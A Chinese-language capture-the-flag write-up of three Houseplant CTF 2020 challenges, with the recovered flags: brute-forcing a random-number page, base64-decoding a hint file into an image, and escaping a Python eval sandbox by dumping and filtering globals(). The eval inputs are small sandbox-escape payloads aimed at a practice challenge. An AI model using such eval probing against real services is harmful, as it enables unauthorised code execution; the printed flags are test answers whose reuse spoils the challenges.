【WriteUp】Houseplant CTF 2020 -- Pwn 题解

Pie Generator

Description:

This website lets you make a pie and have it too!

http://challs.houseplant.riceteacatpanda.wtf:30007

Dev: Jess

Solution:

给了个网页猜随机数,这种爆破题不是 web 题吗,干嘛放 Pwn 这 -.-

Heyo! It appears we received: 8
Nice Job! Flag: rtcp{w0w_sO_p53uD0}

Flag:

rtcp{w0w_sO_p53uD0}

Adventure-Revisited

Description:

Let's go on an adventure!

The solution is in there... somewhere.

(#adventure-revisited on discord)

Creator: Jess

Hint! You might want to read that Story Starter again.

Solution:

骚题目,拿到 hint.7z 文件,发现里面是 base64,用命令得到了一个 png 图片

cat hint.7z | base64 -d > chall.png

得到该图片:

Python Sandbox Escape 题目

当访问 globals 的时候,返回了一堆 HIDDEN

Input:
jst eval return globals()

Output:
Eval
def eval():
    return globals()

Result:
{'iufyzhljcdrqbvak': '[HIDDEN]', 'nwdsrpfzjkxbutqhgca': '[HIDDEN]', 'cyilpftahdmkxjeuowvgnbrzsq': '[HIDDEN]', 'rtluzimwnpofhcxjv': '[HIDDEN]', 'xaglsmyhqjztipkbowevfudc': '[HIDDEN]', 'cprzgxbmniqvof': ...
Input:
jst eval return [key for key in globals().items() if "[HIDDEN]" not in key]

Output:
Eval
def eval():
    return [key for key in globals().items() if "[HIDDEN]" not in key]

Result:
[('djqgsczmurevoaltxfnbi', 'rtcp{}')]
Input:
jst eval return djqgsczmurevoaltxfnbi

Output:
Eval
def eval():
    return djqgsczmurevoaltxfnbi

Result:
rtcp{1tz_n0t_4_bUg_1ts_a_fe4tur3}

Flag:

rtcp{1tz_n0t_4_bUg_1ts_a_fe4tur3}

点赞

发表评论

电子邮件地址不会被公开。必填项已用 * 标注